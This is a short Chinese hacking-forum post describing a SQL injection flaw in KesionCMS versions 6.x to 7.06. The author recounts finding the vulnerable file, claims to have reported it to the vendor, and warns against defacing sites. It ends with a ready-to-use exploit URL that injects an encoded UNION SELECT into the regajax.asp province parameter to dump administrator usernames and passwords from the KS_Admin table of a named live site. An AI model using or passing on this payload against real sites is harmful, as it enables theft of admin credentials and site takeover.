作者:goingta

    网站:http://www.zzfhw.com

    某日逛t00ls.net的时候 看到论坛图片随机显示哪里有一张 标题为 科讯 6.x - 7.06 SQL 注射漏洞

    点进去看  原来核心会员们又在xxoo

    我没权限看 自然是看不了了

    仔细看下图片

    暴露了存在漏洞的文件名

    于是自己也下一套下来看了下

    刚学asp 不是很精通

    后来还是成功爆出账户密码

    拿去官方测试,也还存在

    漏洞通知官方,已补。

    不敢私藏,分享一下

    非主流黑客别用来修改人家主页啊,没得前途

Exp:

http://www.zzfhw.com/user/reg/regajax.asp?action=getcityoption&province=goingta%2527%2520union%2520%2573%2565%256C%2565%2563%2574%25201,username%252B%2527%257C%2527%252Bpassword%2520from%2520KS_Admin%2500